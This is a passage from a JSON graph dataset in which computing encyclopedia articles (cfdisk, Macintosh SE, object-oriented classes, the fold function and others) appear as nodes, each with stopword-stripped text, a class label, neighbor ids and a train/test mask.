disklabel partitioning supported certain architectures compatibility reasons addition bsd disklabel mandatory linux maximum number partitions fdisk 60 3 primary partitions 1 extended partition 56 logical partitions",
    "neighbors": [
      6148,
      2568,
      8713,
      6674,
      8729,
      4636,
      9762,
      1071,
      9780,
      5177,
      8266,
      7244,
      4174,
      7249,
      9306,
      5220,
      1637,
      1647,
      8816,
      9839,
      8306,
      9844,
      633,
      9343,
      8834,
      6787,
      6281,
      652,
      6797,
      4248,
      6297,
      3738,
      8857,
      4771,
      2212,
      7847,
      5293,
      178,
      1718,
      4279,
      2744,
      5819,
      7356,
      10428,
      11459,
      8395,
      1741,
      1750,
      7383,
      10455,
      6361,
      9946,
      10967,
      4850,
      7411,
      1273,
      3323,
      2811,
      6396,
      3841,
      1286,
      3856,
      8976,
      274,
      10000,
      5397,
      292,
      10535,
      808,
      7983,
      10033,
      11573,
      823,
      5437,
      7486,
      8517,
      1361,
      850,
      6491,
      7521,
      1891,
      6506,
      7534,
      2415,
      7027,
      2421,
      2424,
      3970,
      1927,
      10631,
      7561,
      9625,
      1946,
      2462,
      4001,
      7088,
      11698,
      1978,
      960,
      9671,
      1993,
      9166,
      4563,
      4571,
      7136,
      998,
      10727,
      4073,
      9709,
      9201,
      3058,
      11249,
      8692,
      2550
    ],
    "mask": "Test"
  },
  {
    "node_id": 2546,
    "label": 9,
    "text": "Symbolic_Stream_Generator:symbolic stream generator symbolic stream generator ssg software productivity aid unisys mainframe computers former univac 1100/2200 series ssg used generate run-streams corresponding ibm job control language apply administer symbolic changes program sources form version control many purposes ssg program i.e. job control script called skeleton programming language symstream tool created output streams based interpreting data provided via multiple input sources originally created univac creation operating system os updates later adopted general user community creation complex batch real-time computer processes sources could recursively reference additional sources providing wide flexibility input parsing rules output creation also source files similar levels dynamic input capability interpretation multiple input sources allowed dynamic creation output stream content complex recursive processes could applied create program source code job execution sequences simulated dynamic input virtual consoles general provide scripting capabilities reminiscent unix grep yacc tools",
    "neighbors": [
      9780
    ],
    "mask": "Test"
  },
  {
    "node_id": 2547,
    "label": 3,
    "text": "Atari_Panther:atari panther atari panther cancelled 32-bit video game console atari corporation going successor atari 7800 atari xegs developed ex-sinclair team flare technology previously responsible two cancelled console projects flare one konix multisystem panther planned combination atari st atari transputer workstation blossom video hardware work started 1988 planned release 1991 directly compete super nintendo entertainment system sega genesis atari abandoned project favor 64-bit jaguar team flare convinced create 3d graphics hardware instead system features three chips consisting motorola 68000 running 16 mhz object processor called panther ensoniq sound processor called otis featuring 32 sound channels presumably es5505 panther never manufactured design eclipsed jaguar three games planned panther release games later rewritten atari jaguar upon panther demise",
    "neighbors": [
      1776,
      921,
      7269
    ],
    "mask": "Test"
  },
  {
    "node_id": 2548,
    "label": 8,
    "text": "QuickCode:quickcode quickcode formerly scraperwiki web-based platform collaboratively building programs extract analyze public online data wiki-like fashion scraper refers screen scrapers programs extract data websites wiki means user programming experience create edit programs extracting new data analyzing existing datasets main use website providing place programmers journalists collaborate analyzing public data service renamed circa 2016 n't wiki scraping time eponymous parent company renamed 'the sensible code company scrapers created using browser based ide connecting via ssh server running linux programmed using variety programming languages including perl python ruby javascript r. scraperwiki founded 2009 julian todd aidan mcguire initially funded 4ip venture capital arm tv station channel 4 since attracted additional £1 million round funding enterprise ventures francis irving chief executive officer scraperwiki",
    "neighbors": [
      3462,
      8582,
      5833,
      8554,
      2548,
      3478,
      823,
      4187,
      9245,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 2549,
    "label": 3,
    "text": "AMD_K12:amd k12 k12 amd first custom microarchitecture based armv8-a aarch64 instruction set planned release 2017 predecessor a1100 series also armv8-a used arm cortex-a57 cores product still n't released development arm architectures continuing products planned microarchitecture focus high frequency power efficiency target dense server embedded semi-custom market segments",
    "neighbors": [
      3586,
      8322,
      5380,
      9092,
      6151,
      8327,
      10375,
      5645,
      7963,
      2719,
      5541,
      11047,
      2094,
      6978,
      7234,
      11080,
      2764,
      7631,
      980,
      473,
      5356,
      1005,
      9964,
      1137,
      3070
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2550,
    "label": 6,
    "text": "Cfdisk:cfdisk cfdisk linux partition editor similar fdisk different user interface curses part util-linux package linux utility programs originally written 1992 current version 2.29 current cfdisk implementation based libfdisk supports master boot record guid partition table bsd disklabel sgi sun disk labels also provides information partitions content invoked without arguments cfdisk attempts read current partition table disk drive present findings",
    "neighbors": [
      3969,
      546,
      10851,
      9320,
      1801,
      10967,
      652,
      1101,
      7534,
      1071,
      2864,
      2545,
      8909,
      3859,
      8147,
      823,
      10971
    ],
    "mask": "Test"
  },
  {
    "node_id": 2551,
    "label": 3,
    "text": "Macintosh_512Ke:macintosh 512ke macintosh 512k enhanced 512ke introduced april 1986 cheaper alternative top-of-the-line macintosh plus debuted three months previously macintosh 512k 800k disk drive 128k rom used macintosh plus like predecessors little room expansion companies create memory upgrades brought machine 2 mb earliest macintosh model able run system software 6 also earliest used appleshare server bridge mac communicate modern devices originally case identical predecessor except model number listed rear bucket agency approval label used beige-like color well like macintosh plus 1987 512ke adopted standard apple platinum color well case-front design plus without name though keeping original rear bucket later lifespan 512ke discounted offered educational market badged macintosh ed m0001d later m0001ed 512ke shipped original short macintosh keyboard extended macintosh plus keyboard built-in numeric keypad could purchased optionally version 512ke sold outside north america included full keyboard marketed macintosh 512k/800 later larger keyboard would included standard north america well although 512ke includes 128k roms 800k disk drive mac plus 512ke retains port connectors original mac reason 512ke users hard disk option slower floppy-port-based hard disk 20 similar products serial port even though 512ke roms contain scsi manager software enables use faster scsi hard disks roms ones used mac plus scsi port apple point users certain third-party products could added 512ke provide scsi port macintosh 512k could upgraded 512ke purchasing installing apple 299 macintosh plus disk drive kit included following one upgrade made apple replaced logic board rear case accommodate different port configuration macintosh plus providing built-in scsi functionality 4mb ram apple official upgrades costly many third-party manufacturers offered add-on scsi cards well ram upgrades achieve functionality new rom allowed computer run much newer system application software though loaded data ram slightly decreased amount available memory – 1.5k – leaving well 370k available applications june 1986 512ke shipped system 3.2 discontinued apple changed recommended os 512ke system 4.1 system 6.0.8 maximum os 512ke",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      576,
      1090,
      4180,
      10838,
      10840,
      9312,
      7269,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      2839,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      11171,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      7151,
      5616,
      6130,
      2553,
      8700,
      1534
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2552,
    "label": 8,
    "text": "Mapmyuser.com:mapmyuser.com mapmyuser web traffic analysis tool mapmyuser provides realtime web stats visitor geolocation statistics mapmyuser used compute web usage share example",
    "neighbors": [
      1943,
      735,
      3688,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 2553,
    "label": 3,
    "text": "Macintosh_SE:macintosh se macintosh se personal computer designed manufactured sold apple computer inc. march 1987 october 1990 marked significant improvement macintosh plus design introduced apple time macintosh ii se retains compact macintosh form factor original macintosh computer introduced three years earlier uses design language used macintosh ii enhanced model se/30 introduced january 1989 sales original se continued macintosh se updated august 1989 include superdrive updated version called macintosh se fdhd later macintosh se superdrive macintosh se replaced macintosh classic similar model retained central processing unit form factor lower price point macintosh se introduced appleworld conference los angeles march 2 1987 se acronym system expansion notable new features compared similar predecessor macintosh plus se macintosh ii first apple computers since apple sold without keyboard instead customer offered choice new adb apple keyboard apple extended keyboard apple produced ten ses transparent cases prototypes promotional shots employees extremely rare command premium price collectors macintosh se shipped system 4.0 finder 5.4 version specific computer macintosh ii announced time shipped month later includes system 4.1 finder 5.5 readme file included installation disks se ii first place apple ever used term macintosh system software 1998 two versions retroactively given name macintosh system software 2.0.1 processor motorola 68000 8 mhz 8 mhz system bus 16-bit data path ram se came 1 mb ram standard expandable 4 mb logic board four 30-pin simm slots memory must installed pairs must 150 ns faster video 256 kb onboard video memory enabling 512x384 monochrome resolution built-in screen lower resolution storage se accommodate either one two floppy drives floppy drive hard drive after-market brackets designed allow se accommodate two floppy drives well hard drive however configuration supported apple addition external floppy disk drive may also connected making se macintosh besides macintosh portable could support three floppy drives though increased storage ram capacity optional internal hard drive rendered external drives less necessity predecessors single-floppy se models also featured drive-access light spot second floppy drive would hard-drive equipped models came 20 mb scsi hard disk battery soldered logic board 3.0 v 1/2aa lithium battery must present order basic settings persist power cycles macintosh se machines sat long time experienced battery corrosion leakage resulting damaged case logic board expansion processor direct slot logic board allows expansion cards accelerators installed se upgraded 50 mhz 5 mb micromac accelerators past accelerators also available sonnet allegro since installing card required opening computer case exposing user high voltages internal crt apple recommended authorized apple dealers install cards case sealed then-uncommon torx screws upgrades apple introduced macintosh se/30 january 1989 logic board upgrade sold apple dealers high-cost upgrade se consisting new se/30 motherboard case front internal chassis accommodate upgrade components easter egg macintosh se rom size increased 64 kb original mac 256 kb allowed development team include easter egg hidden roms jumping address 0x41d89a reading rom chips possible display four images engineering team introduced march 2 1987 introduced august 1 1989",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      576,
      1090,
      4180,
      10838,
      10840,
      9312,
      7269,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      3350,
      2839,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      11171,
      8109,
      10173,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6130,
      2551,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 2554,
    "label": 4,
    "text": "Videntifier:videntifier videntifier icelandic software company developed method quickly identify videos images automatic manner videntifier patented technology store fingerprints enormous amounts video content images identify reference material within seconds usually single frame enough identify entire video currently company headquartered reykjavik iceland office vilnius lithuania videntifier technologies founded september 2007 provides technology search track vast amounts multimedia data efficient manner previously company focused providing services police departments engaged locating illegal images videos seized computers company roots database laboratories reykjavik university later opened secondary lab irisa-cnrs rennes 2005 videntifier technologies received one top prizes austrian genius competition best business idea 2008 innovation award 2008 2008 videntifier technologies received golden egg award best new business idea iceland 2013 videntifier technologies signed agreement interpol provide advanced imaging technology effort child sexual abuse material",
    "neighbors": [
      9488,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 2555,
    "label": 6,
    "text": "Grid_file_system:grid file system grid file system computer file system whose goal improved reliability availability taking advantage many smaller file storage areas file systems contain three components grid file system would similar needs file systems designed appear single disk single computer manage entirely many new challenges arise grid scenario whereby single disk within grid capable handling requests data contained grid file storage utilizes layers redundancy achieve high level data protection inability lose data current means redundancy include replication parity checks redundancy implemented via raid array whereby multiple physical disks appear local computer single disk may include data replication and/or disk partitioning similarly grid file system would consist level redundancy either logical file level block level possibly including sort parity check across various disks present grid first foremost file table mechanism necessary additionally file table must include mechanism locating target/destination file within grid secondly mechanism working file data must exist mechanism responsible making file data available requests bittorrent technology parallel drawn grid file system torrent tracker search engine would file table torrent applications transmitting files would file data component rss feed like mechanism could utilized file table nodes indicate new files added table instigate replication similar components file system may incorporate similar technology distributed replication distributed data request/fulfillment systems file table file data capable addressed single entity i.e using virtual nodes cluster growth system could easily controlled simply deciding uses grid member would responsible file table file lookups and/or file data assuming exists method managing data replication assigning quotas etc autonomously within grid data could configured high availability regardless loss outage largest problem currently revolves around distributing data updates torrents support minimal hierarchy currently implemented either metadata torrent tracker strictly ui basic categorization updating multiple nodes concurrently assuming atomic transactions required presents latency updates additions usually point feasible additionally grid network based file system breaks traditional tcp/ip paradigms file system generally low level ring 0 type operations require complicated tcp/ip implementations introducing layers abstraction complication process creating grid file system examples high-available data include",
    "neighbors": [
      5120,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      1049,
      9762,
      5158,
      11323,
      8772,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6813,
      6309,
      1190,
      5286,
      10405,
      7344,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      6961,
      5956,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      3428,
      10596,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      8643,
      7126,
      1509,
      9189,
      6124,
      11256,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 2556,
    "label": 9,
    "text": "Class_(computer_programming):class computer programming object-oriented programming class extensible program-code-template creating objects providing initial values state member variables implementations behavior member functions methods many languages class name used name class template name default constructor class subroutine creates objects type objects generated instantiating class distinct concepts easily conflated object created constructor class resulting object called instance class member variables specific object called instance variables contrast class variables shared across class languages classes compile-time feature new classes declared run-time languages classes first-class citizens generally objects typically type similar languages class creates classes called metaclass casual use people often refer class object narrowly speaking objects type interface namely types member variables signatures member functions methods properties satisfy time class implementation specifically implementation methods create objects given type given implementation terms type theory class implementationa concrete data structure collection subroutineswhile type interface different concrete classes produce objects abstract type depending type system example type might implemented two classes fast small stacks scales poorly scales well high overhead small stacks similarly given class may several different constructors types generally represent nouns person place thing something nominalized class represents implementation example type might represent properties functionality bananas general classes would represent ways producing bananas say banana suppliers data structures functions represent draw bananas video game class could produce particular bananas instances class would objects type often single implementation type given case class name often identical type name classes composed structural behavioral constituents programming languages include classes programming construct offer support various class-related features syntax required use features varies greatly one programming language another class contains data field descriptions properties fields data members attributes usually field types names associated state variables program run time state variables either belong class specific instances class languages structure defined class determines layout memory used instances implementations possible example objects python use associative key-value containers programming languages support specification invariants part definition class enforce type system encapsulation state necessary able enforce invariants class behavior class instances defined using methods methods subroutines ability operate objects classes operations may alter state object simply provide ways accessing many kinds methods exist support varies across languages types methods created called programmer code special methods—such constructors destructors conversion operators—are created called compiler-generated code language may also allow programmer define call special methods every class implements realizes interface providing structure behavior structure consists data state behavior consists code specifies methods implemented distinction definition interface implementation interface however line blurred many programming languages class declarations define implement interface languages however provide features separate interface implementation example abstract class define interface without providing implementation languages support class inheritance also allow classes inherit interfaces classes derived example class inherits class b class b implements interface interface b class also inherits functionality constants methods declaration provided interface b languages support access specifiers interface class considered set public members class including methods attributes via implicit getter setter methods private members internal data structures intended depended external code thus part interface object-oriented programming methodology dictates operations interface class independent results layered design clients interface use methods declared interface interface places requirements clients invoke operations one interface particular order approach benefit client code assume operations interface available use whenever client access object buttons front television set interface electrical wiring side plastic casing press power button toggle television example particular television instance method represented button buttons together comprise interface television sets model would interface common form interface specification group related methods without associated implementation methods television set also myriad attributes size whether supports colour together comprise structure class represents full description television including attributes structure buttons interface getting total number televisions manufactured could static method television class method clearly associated class yet outside domain individual instance class static method finds particular instance set television objects another example following common set access specifiers although many object-oriented languages support access specifiers semantics may differ object-oriented design uses access specifiers conjunction careful design public method implementations enforce class invariants—constraints state objects common usage access specifiers separate internal data class interface internal structure made private public accessor methods used inspect alter private data access specifiers necessarily control visibility even private members may visible client external code languages inaccessible visible member may referred run-time example pointer returned member function attempt use referring name member client code prevented type checker various object-oriented programming languages enforce member accessibility visibility various degrees depending language type system compilation policies enforced either compile-time run-time example java language allow client code accesses private data class compile languages feature accessibility schemes addition design standalone classes programming languages may support advanced class design based upon relationships classes inter-class relationship design capabilities commonly provided compositional hierarchical classes composed classes thereby establishing compositional relationship enclosing class embedded classes compositional relationship classes also commonly known has-a relationship example class car could composed contain class engine therefore car engine one aspect composition containment enclosure component instances instance enclosing object contains component instances value components enclosing object similar lifetime components contained reference may similar lifetime example objective-c 2.0 class instance string object array object classes derived one existing classes thereby establishing hierarchical relationship derived-from classes base classes parent classes derived class child class subclass relationship derived class derived-from classes commonly known is-a relationship example class 'button could derived class 'control therefore button control structural behavioral members parent classes inherited child class derived classes define additional structural members data fields behavioral members methods addition inherit therefore specializations superclasses also derived classes override inherited methods language allows languages support multiple inheritance example java allows class implement multiple interfaces inherit one class multiple inheritance allowed hierarchy directed acyclic graph dag short otherwise tree hierarchy classes nodes inheritance relationships links classes level likely associated classes different levels levels hierarchy called layers levels abstraction example simplified objective-c 2.0 code iphone sdk example uitableview uiscrollview uiview uiresponder nsobject conceptually superclass superset subclasses example common class hierarchy would involve superclass would subclass subset relations set theory well i.e. squares rectangles rectangles squares common conceptual error mistake part relation subclass example car truck kinds vehicles would appropriate model subclasses vehicle class however would error model component parts car subclass relations example car composed engine body would appropriate model engine body subclass car object-oriented modeling kinds relations typically modeled object properties example class would property called would typed hold collection objects instances etc object modeling languages uml include capabilities model various aspects part kinds relations – data cardinality objects constraints input output values etc information utilized developer tools generate additional code beside basic data definitions objects error checking get set methods one important question modeling implementing system object classes whether class one superclasses real world actual sets would rare find sets n't intersect one set however systems flavors clos provide capability one parent run time introduces complexity many object-oriented community consider antithetical goals using object classes first place understanding class responsible handling message get complex dealing one superclass used carelessly feature introduce system complexity ambiguity classes designed avoid modern object-oriented languages smalltalk java require single inheritance run time languages multiple inheritance may useful modeling implementation however semantic web application objects multiple superclasses volatility internet requires level flexibility technology standards web ontology language owl designed support similar issue whether class hierarchy modified run time languages flavors clos smalltalk support feature part meta-object protocols since classes first-class objects possible dynamically alter structure sending appropriate messages languages focus strong typing java c++ allow class hierarchy modified run time semantic web objects capability run time changes classes rational similar justification allowing multiple superclasses internet dynamic flexible dynamic changes hierarchy required manage volatility although class-based languages commonly assumed support inheritance inheritance intrinsic aspect concept classes languages often referred object-based languages support classes yet support inheritance examples object-based languages include earlier versions visual basic object-oriented analysis uml association two classes represents collaboration classes corresponding instances associations direction example bi-directional association two classes indicates classes aware relationship associations may labeled according name purpose association role given end association describes role corresponding class example subscriber role describes way instances class person participate subscribes-to association class magazine also magazine subscribed magazine role association association role multiplicity describes many instances correspond instance class association common multiplicities 0..1 1..1 1..* 0..* specifies number instances many categories classes overlap language supports inheritance abstract class abstract base class abc class instantiated either labeled abstract simply specifies abstract methods virtual methods abstract class may provide implementations methods may also specify virtual methods via signatures implemented direct indirect descendants abstract class class derived abstract class instantiated abstract methods parent classes must implemented class derivation chain object-oriented programming languages allow programmer specify classes considered abstract allow instantiated example java c php keyword abstract used c++ abstract class class least one abstract method given appropriate syntax language pure virtual function c++ parlance class consisting virtual methods called pure abstract base class pure abc c++ also known interface users language languages notably java c support variant abstract classes called interface via keyword language languages multiple inheritance allowed class implement multiple interfaces class contain abstract publicly accessible methods concrete class class instantiated opposed abstract classes languages classes declared scopes global scope various types classes inner class class defined within another class relationship inner class containing class also treated another type class association inner class typically neither associated instances enclosing class instantiated along enclosing class depending language may may possible refer class outside enclosing class related concept inner types also known inner data type nested type generalization concept inner classes c++ example language supports inner classes inner types via typedef declarations another type local class class defined within procedure function limits references class name within scope class declared depending semantic rules language may additional restrictions local classes compared non-local ones one common restriction disallow local class methods access local variables enclosing function example c++ local class may refer static variables declared within enclosing function may access function automatic variables metaclasses classes whose instances classes metaclass describes common structure collection classes implement design pattern describe particular kinds classes metaclasses often used describe frameworks languages python ruby smalltalk class also object thus class instance unique metaclass built language common lisp object system clos non-subclassable classes allow programmers design classes hierarchies classes level hierarchy derivation prohibited stand-alone class may also designated non-subclassable preventing formation hierarchy contrast abstract classes imply encourage require derivation order used non-subclassable class implicitly concrete non-subclassable class created declaring class c java php example java class designated final non-subclassable classes may allow compiler compiled languages perform optimizations available subclassable classes open class one changed typically executable program changed customers developers often change classes typically change standard built-in ones ruby classes open python classes created runtime modified afterwards objective-c categories permit programmer add methods existing class without need recompile class even access source code languages special support mixins though language multiple inheritance mixin simply class represent is-a-type-of relationship mixins typically used add methods multiple classes example class might provide method called included classes share common parent languages supporting feature partial class class whose definition may split multiple pieces within single source-code file across multiple files pieces merged compile-time making compiler output non-partial class primary motivation introduction partial classes facilitate implementation code generators visual designers otherwise challenge compromise develop code generators manage generated code interleaved within developer-written code using partial classes code generator process separate file coarse-grained partial class within file thus alleviated intricately interjecting generated code via extensive parsing increasing compiler efficiency eliminating potential risk corrupting developer code simple implementation partial classes compiler perform phase precompilation unifies parts partial class compilation proceed usual benefits effects partial class feature include partial classes existed smalltalk name class extensions considerable time arrival .net framework 2 microsoft introduced partial classes supported c 2.0 visual basic 2005 winrt also supports partial classes simple example written visual basic .net shows parts class defined two different files compiled result two files written one like objective-c partial classes also known categories may even spread multiple libraries executables like following example key difference objective-c categories overwrite definitions another interface declaration categories n't equal original class definition first requires last instead .net partial class ca n't conflicting definitions partial definitions equal others foundation header file nsdata.h user-supplied library separate binary foundation framework header file nsdata+base64.h app yet another separate binary file source code file main.m dispatcher find methods called nsdata instance invoke correctly uninstantiable classes allow programmers group together per-class fields methods accessible runtime without instance class indeed instantiation prohibited kind class example c class marked static instantiated static members fields methods may instance constructors sealed unnamed class anonymous class class bound name identifier upon definition analogous named versus unnamed functions benefits organizing software object classes fall three categories object classes facilitate rapid development lessen semantic gap code users system analysts talk developers users using essentially vocabulary talking accounts customers bills etc object classes often facilitate rapid development object-oriented environments come powerful debugging testing tools instances classes inspected run time verify system performing expected also rather get dumps core memory object-oriented environments interpreted debugging capabilities developer analyze exactly program error occurred see methods called arguments arguments object classes facilitate ease maintenance via encapsulation developers need change behavior object localize change object component parts reduces potential unwanted side effects maintenance enhancements software re-use also major benefit using object classes classes facilitate re-use via inheritance interfaces new behavior required often achieved creating new class class inherit default behaviors data superclass tailor aspect behavior data accordingly re-use via interfaces also known methods occurs another object wants invoke rather create new kind object class method re-use removes many common errors make way software one program re-uses code another data type class usually considered compile-time construct language may also support prototype factory metaobjects represent run-time information classes even represent metadata provides access reflection facilities ability manipulate data structure formats run-time many languages distinguish kind run-time type information classes class basis information needed run-time dynamic languages make strict distinctions run-time compile-time constructs therefore may distinguish metaobjects classes example human metaobject representing class person instances class person created using facilities human metaobject",
    "neighbors": [
      2048,
      10754,
      4101,
      9224,
      1034,
      1546,
      531,
      2585,
      3613,
      3102,
      9245,
      10786,
      11307,
      5677,
      5680,
      7219,
      9780,
      1591,
      2617,
      4155,
      8251,
      11327,
      10819,
      6239,
      2145,
      4201,
      2666,
      623,
      9330,
      9331,
      3702,
      3705,
      5754,
      7292,
      9345,
      2691,
      8324,
      5255,
      7307,
      9877,
      8854,
      5783,
      4770,
      3235,
      5796,
      4777,
      2221,
      6143,
      1724,
      190,
      191,
      6334,
      6335,
      5316,
      5830,
      9926,
      5833,
      6860,
      7889,
      8401,
      5845,
      7894,
      8414,
      7395,
      4838,
      7398,
      10470,
      10991,
      2804,
      9466,
      3323,
      8955,
      5885,
      7421,
      2304,
      5896,
      10510,
      5395,
      1308,
      10013,
      10537,
      8502,
      11574,
      5945,
      4410,
      1343,
      9023,
      11589,
      10568,
      5961,
      333,
      847,
      338,
      2903,
      3416,
      9561,
      4452,
      9575,
      8554,
      10097,
      11132,
      2438,
      3462,
      4486,
      8582,
      910,
      3990,
      11670,
      9626,
      11674,
      10654,
      10145,
      11683,
      4516,
      6061,
      2482,
      6067,
      1973,
      10684,
      3517,
      8644,
      6087,
      4042,
      6102,
      10198,
      4058,
      2011,
      4572,
      477,
      3038,
      992,
      993,
      9701,
      3558,
      487,
      7144,
      3562,
      3051,
      4074,
      2029,
      7147,
      11242,
      3573,
      6651,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 2557,
    "label": 9,
    "text": "Fold_(higher-order_function):fold higher-order function functional programming fold also termed reduce accumulate aggregate compress inject refers family higher-order functions analyze recursive data structure use given combining operation recombine results recursively processing constituent parts building return value typically fold presented combining function top node data structure possibly default values used certain conditions fold proceeds combine elements data structure hierarchy using function systematic way folds sense dual unfolds take seed value apply function corecursively decide progressively construct corecursive data structure whereas fold recursively breaks structure replacing results applying combining function node terminal values recursive results catamorphism versus anamorphism unfolds folds regarded consistently replacing structural components data structure functions values lists example built many functional languages two primitives list either empty list commonly called nil codice_1 constructed prefixing element front another list creating called cons node codice_2 resulting application codice_3 function written colon codice_4 haskell one view fold lists replacing nil end list specific value replacing cons specific function replacements viewed diagram another way perform structural transformation consistent manner order two links node flipped fed combining function pictures illustrate right left fold list visually also highlight fact codice_5 identity function lists shallow copy lisp parlance replacing cons codice_3 nil codice_7 change result left fold diagram suggests easy way reverse list codice_8 note parameters cons must flipped element add right hand parameter combining function another easy result see vantage-point write higher-order map function terms codice_9 composing function act elements codice_3 period operator denoting function composition way looking things provides simple route designing fold-like functions algebraic data types structures like various sorts trees one writes function recursively replaces constructors datatype provided functions constant values type provided values function generally referred catamorphism folding list codice_11 addition operator would result 15 sum elements list codice_11 rough approximation one think fold replacing commas list operation giving codice_13 example associative operation final result regardless parenthesization although specific way calculated different general case non-associative binary functions order elements combined may influence final result value lists two obvious ways carry either combining first element result recursively combining rest called right fold combining result recursively combining elements last one last element called left fold corresponds binary operator either right-associative left-associative haskell prolog terminology right fold sum would parenthesized codice_14 whereas left fold would parenthesized codice_15 practice convenient natural initial value case right fold used one reaches end list case left fold initially combined first element list example value 0 additive identity would chosen initial value giving codice_16 right fold codice_17 left fold multiplication initial choice 0 would n't work codice_18 identity element multiplication 1 would give us outcome codice_19 use initial value necessary combining function f asymmetrical types e.g codice_20 i.e type result different type list elements initial value must used type f result linear chain applications possible whether left- right-oriented determined types expected arguments combining function second argument must type result f could seen binary operation associates right vice versa function magma i.e symmetrical types codice_21 result type list elements type parentheses may placed arbitrary fashion thus creating tree nested sub-expressions e.g. codice_22 binary operation f associative value well-defined i.e. parenthesization although operational details calculated different significant impact efficiency f non-strict whereas linear folds node-oriented operate consistent manner node list tree-like folds whole-list oriented operate consistent manner across groups nodes one often wants choose identity element operation f initial value z initial value seems appropriate example one wants fold function computes maximum two parameters non-empty list get maximum element list variants codice_9 codice_24 use last first element list respectively initial value haskell several languages called codice_25 codice_26 1 making reference automatic provision initial element fact lists applied must least one element folds use type-symmetrical binary operation types arguments result must richard bird 2010 book proposes general fold function non-empty lists codice_27 transforms last element applying additional argument function value result type starting folding thus able use type-asymmetrical binary operation like regular codice_9 produce result type different list elements type using haskell example codice_24 codice_9 formulated equations list empty result initial value fold tail list using new initial value result applying f old initial value first element list empty result initial value z apply f first element result folding rest lists folded tree-like fashion finite indefinitely defined lists case codice_31 function avoid runaway evaluation indefinitely defined lists function codice_32 must always demand second argument value least and/or immediately see example presence lazy non-strict evaluation codice_9 immediately return application f head list recursive case folding rest list thus f able produce part result without reference recursive case right i.e. second argument rest result never demanded recursion stop e.g. allows right folds operate infinite lists contrast codice_24 immediately call new parameters reaches end list tail recursion efficiently compiled loop ca n't deal infinite lists — recurse forever infinite loop reached end list expression effect built codice_24 nested left-deepening codice_32-applications presented caller evaluated function codice_32 refer second argument first able produce part result without reference recursive case left i.e. first argument recursion would stop means codice_9 recurses right allows lazy combining function inspect list elements left conversely codice_24 recurses left allows lazy combining function inspect list elements right chooses e.g. reversing list also tail-recursive implemented using finite lists means left-fold reverse composed perform right fold tail-recursive way cf modification function codice_32 reverses order arguments i.e. tail-recursively building representation expression right-fold would build extraneous intermediate list structure eliminated continuation-passing style technique similarly codice_41 needed languages like haskell flipped order arguments combining function codice_24 unlike e.g. scheme order arguments used combining functions codice_24 another technical point case left folds using lazy evaluation new initial parameter evaluated recursive call made lead stack overflows one reaches end list tries evaluate resulting potentially gigantic expression reason languages often provide stricter variant left folding forces evaluation initial parameter making recursive call haskell codice_44 note apostrophe pronounced 'prime function codice_45 library one needs aware fact though forcing value built lazy data constructor wo n't force constituents automatically combined tail recursion folds approach efficiency loops ensuring constant space operation lazy evaluation final result impossible undesirable using haskell interpreter structural transformations fold functions perform illustrated constructing string infinite tree-like folding demonstrated e.g. recursive primes production unbounded sieve eratosthenes haskell function codice_46 operates ordered lists local manner efficiently produce set union codice_47 set difference finite lists e.g. merge sort duplicates-removing variety codice_48 could easily defined using tree-like folding function haskell 98 features mergesort|codice_49 duplicates-preserving variant codice_46 functions codice_51 codice_52 could defined folding language left fold right fold left fold without initial value right fold without initial value unfold notes category higher-order functions category recursion category programming language comparisons category articles example haskell code category articles example scheme code category iteration programming",
    "neighbors": [
      4101,
      3462,
      8582,
      6536,
      2062,
      3733,
      8854,
      5783,
      10395,
      5917,
      7326,
      9245,
      8226,
      3876,
      5031,
      5165,
      5677,
      8116,
      11574,
      6074,
      8514,
      8644,
      5833,
      8397,
      11343,
      7889,
      2519,
      1112,
      10083,
      228,
      8421,
      6502,
      9828,
      4840,
      8554,
      8810,
      2670,
      3442,
      3705,
      2811,
      7292
    ],
    "mask": "Test"
  },
  {
    "node_id": 2558,
    "label": 4,
